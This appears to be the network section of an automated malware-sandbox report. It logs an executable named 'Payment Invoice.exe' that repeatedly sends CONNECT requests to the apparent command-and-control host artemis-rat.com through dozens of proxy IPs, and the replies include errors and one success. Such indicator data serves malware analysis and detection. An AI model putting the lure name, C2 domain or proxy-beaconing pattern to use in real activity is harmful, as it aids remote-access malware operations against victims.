                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1852192.168.2.454163199.102.105.24241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.729923964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1853192.168.2.454967162.241.45.22449317076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.770596981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841536999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852066040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1854192.168.2.45251351.75.125.208409987076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.773288012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1855192.168.2.455182177.38.5.1641537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.789303064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1856192.168.2.45512572.167.222.11341257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.791151047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.824309111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.824362993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.824302912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1857192.168.2.45495737.187.77.58197677076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.791486025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.329304934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.886312962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886760950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.946214914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.975099087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.980150938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.886464119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1858192.168.2.45256554.36.122.16445877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.791496038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841660023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852066994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1859192.168.2.454960161.97.163.52311257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.792231083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841547966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852067947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.886452913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1860192.168.2.455071166.62.38.10024537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.808238029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841660023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852066994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.886477947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.886152029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.886109114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:01.886116028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1861192.168.2.45493498.162.25.2341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.809214115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1862192.168.2.455190125.122.26.24210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.809341908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589479923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1863192.168.2.455014152.32.68.171655357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.816334009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841581106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852067947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.886461020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1864192.168.2.455115109.238.12.156286187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.827361107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841630936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1865192.168.2.454941194.9.80.150607076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.828476906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.026752949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.719544888 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1866192.168.2.45503941.242.116.150500037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.836534977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841604948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852117062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.886464119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1867192.168.2.45262751.89.173.40278877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.840764046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.026753902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1868192.168.2.455194122.114.232.1378087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.840966940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1869192.168.2.45379567.201.59.7041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.844088078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1870192.168.2.45280766.228.33.190147917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.853068113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.026742935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.027084112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.120565891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.120529890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:02.120505095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:14.136193037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.323755026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:26.417412996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1871192.168.2.45498551.68.164.77168927076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.867911100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.027033091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1872192.168.2.452760178.128.113.118231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.872850895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.876817942 CET536INHTTP/1.1 502 Bad Gateway
                                                                Server: squid
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:26 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3693
                                                                X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1873192.168.2.452886162.214.170.144535487076C:\Users\user\Desktop\Payment Invoice.exe
